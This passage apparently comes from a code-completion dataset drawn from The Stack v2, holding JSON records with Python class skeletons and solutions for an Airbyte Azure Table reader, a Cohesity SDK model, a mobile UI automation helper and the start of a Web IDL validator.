account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration obect\"\"\"\n <|body_0|>\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitate interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n <|body_1|>\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitate interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like create table client for.\"\"\"\n <|body_2|>\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n <|body_3|>\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_3|>\n\n<|body_start_4|>\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n<|end_body_4|>\n", "revision_id": "8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6", "skeleton": "<|skeleton|>\nclass AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration obect\"\"\"\n <|body_0|>\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitate interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n <|body_1|>\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitate interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like create table client for.\"\"\"\n <|body_2|>\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n <|body_3|>\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration obect\"\"\"\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitate interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitate interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like create table client for.\"\"\"\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n", "source": "the_stack_v2_python_sparse", "source_path": "dts/airbyte/airbyte-integrations/connectors/source-azure-table/source_azure_table/azure_table.py", "source_repo": "alldatacenter/alldata", "split": "test", "star_events_count": 774} {"blob_id": "cd8d22e46ba847769f048ad78e47486e3e3c9c43", "bodies": ["self.protection_sources = protection_sources\nself.sid = sid\nself.views = views", "if dictionary is None:\n return None\nprotection_sources = None\nif dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\nsid = dictionary.get('sid')\nviews = None\nif dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\nreturn cls(protection_sources, sid, views)"], "bodies_text": "<|body_start_0|>\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.", "class_name": "SourcesForSid", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000484", "length_bytes": 2792, "license_type": "permissive", "methods": [{"docstring": "Constructor for the SourcesForSid class", "name": "__init__", "signature": "def __init__(self, protection_sources=None, sid=None, views=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `SourcesForSid` described below.\n\nClass description:\nImplementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\n\nMethod signatures and docstrings:\n- def __init__(self, protection_sources=None, sid=None, views=None): Constructor for the SourcesForSid class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `SourcesForSid` described below.\n\nClass description:\nImplementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\n\nMethod signatures and docstrings:\n- def __init__(self, protection_sources=None, sid=None, views=None): Constructor for the SourcesForSid class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/sources_for_sid.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "b9f2c99e1f499d12ebfaa30640a27f22827b6d09", "bodies": ["self._element_tag = element_tag\nself._xpath = xpath\nself.__main_controller = controller\nself._element = None", "try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\nexcept NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()", "if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\nreturn self._element.is_displayed()", "if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\nreturn self._element.is_enabled()", "if self._element is None:\n self._set_element()\nreturn self._element.get_attibute(name)", "if self._element is None:\n self._set_element()\nif self._element.is_displayed() and self._element.is_enabled():\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n<|end_body_1|>\n\n<|body_start_2|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n<|end_body_2|>\n\n<|body_start_3|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n<|end_body_3|>\n\n<|body_start_4|>\n if self._element is None:\n self._set_element()\n return self._element.get_attibute(name)\n<|end_body_4|>\n\n<|body_start_5|>\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n<|end_body_5|>\n", "class_docstring": "UIObject definition", "class_name": "UIObject", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def __init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n <|body_0|>\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. Virtualizes the UI element.\"\"\"\n <|body_1|>\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element of visible, False otherwise.\"\"\"\n <|body_2|>\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n <|body_3|>\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n <|body_4|>\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable of not. * if it is enabled and visible.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n<|end_body_1|>\n\n<|body_start_2|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n<|end_body_2|>\n\n<|body_start_3|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n<|end_body_3|>\n\n<|body_start_4|>\n if self._element is None:\n self._set_element()\n return self._element.get_attibute(name)\n<|end_body_4|>\n\n<|body_start_5|>\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000485", "length_bytes": 2764, "license_type": "no_license", "methods": [{"docstring": "Constructor. :param controller: Main Controller :param element_tag: The path of the ui object", "name": "__init__", "signature": "def __init__(self, controller, element_tag=None, xpath=None)"}, {"docstring": "Creates the link between the class and the UI element. Virtualizes the UI element.", "name": "_set_element", "signature": "def _set_element(self)"}, {"docstring": "Checks if the element is visible or not. :return: True if the element of visible, False otherwise.", "name": "is_visible", "signature": "def is_visible(self)"}, {"docstring": "Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.", "name": "is_enabled", "signature": "def is_enabled(self)"}, {"docstring": "Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.", "name": "get_attribute", "signature": "def get_attribute(self, name)"}, {"docstring": "Checks if the element is interactable of not. * if it is enabled and visible.", "name": "_is_interactable", "signature": "def _is_interactable(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_001868", "prompt": "Implement the Python class `UIObject` described below.\n\nClass description:\nUIObject definition\n\nMethod signatures and docstrings:\n- def __init__(self, controller, element_tag=None, xpath=None): Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\n- def _set_element(self): Creates the link between the class and the UI element. Virtualizes the UI element.\n- def is_visible(self): Checks if the element is visible or not. :return: True if the element of visible, False otherwise.\n- def is_enabled(self): Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\n- def get_attribute(self, name): Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\n- def _is_interactable(self): Checks if the element is interactable of not. * if it is enabled and visible.", "prompted_full_text": "Implement the Python class `UIObject` described below.\n\nClass description:\nUIObject definition\n\nMethod signatures and docstrings:\n- def __init__(self, controller, element_tag=None, xpath=None): Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\n- def _set_element(self): Creates the link between the class and the UI element. Virtualizes the UI element.\n- def is_visible(self): Checks if the element is visible or not. :return: True if the element of visible, False otherwise.\n- def is_enabled(self): Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\n- def get_attribute(self, name): Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\n- def _is_interactable(self): Checks if the element is interactable of not. * if it is enabled and visible.\n\n<|skeleton|>\nclass UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def __init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n <|body_0|>\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. Virtualizes the UI element.\"\"\"\n <|body_1|>\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element of visible, False otherwise.\"\"\"\n <|body_2|>\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n <|body_3|>\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n <|body_4|>\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable of not. * if it is enabled and visible.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n<|end_body_1|>\n\n<|body_start_2|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n<|end_body_2|>\n\n<|body_start_3|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n<|end_body_3|>\n\n<|body_start_4|>\n if self._element is None:\n self._set_element()\n return self._element.get_attibute(name)\n<|end_body_4|>\n\n<|body_start_5|>\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n<|end_body_5|>\n", "revision_id": "f9522c301d6bf2e0086316b1e212a39a366bcfc6", "skeleton": "<|skeleton|>\nclass UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def __init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n <|body_0|>\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. Virtualizes the UI element.\"\"\"\n <|body_1|>\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element of visible, False otherwise.\"\"\"\n <|body_2|>\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n <|body_3|>\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n <|body_4|>\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable of not. * if it is enabled and visible.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def __init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. Virtualizes the UI element.\"\"\"\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element of visible, False otherwise.\"\"\"\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n if self._element is None:\n self._set_element()\n return self._element.get_attibute(name)\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable of not. * if it is enabled and visible.\"\"\"\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "src/model/UIElements/UIObject.py", "source_repo": "meltiseugen/mobile-automation-framework", "split": "test", "star_events_count": 0} {"blob_id": "eee18abb93ebdf80418580163a8aa400d31eef34", "bodies": ["assert isinstance(web_idl_database, web_idl.Database)\nself._web_idl_database = web_idl_database\nself._target_store = TargetStore(web_idl_database)", "assert isinstance(rule_store, RuleStore)\nrule = None\ntarget_type = None\ntarget_object = None\n\ndef assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\nfor target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)"], "bodies_text": "<|body_start_0|>\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n<|end_body_1|>\n", "class_docstring": "Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.", "class_name": "Validator", "detected_licenses": ["GPL-1.0-or-later", "MIT", "LGPL-2.0-or-later", "Apache-2.0", "LicenseRef-scancode-warranty-disclaimer", "LGPL-2.1-only", "GPL-2.0-only", "LGPL-2.0-only", "BSD-2-Clause", "LicenseRef-scancode-other-copyleft", "BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n 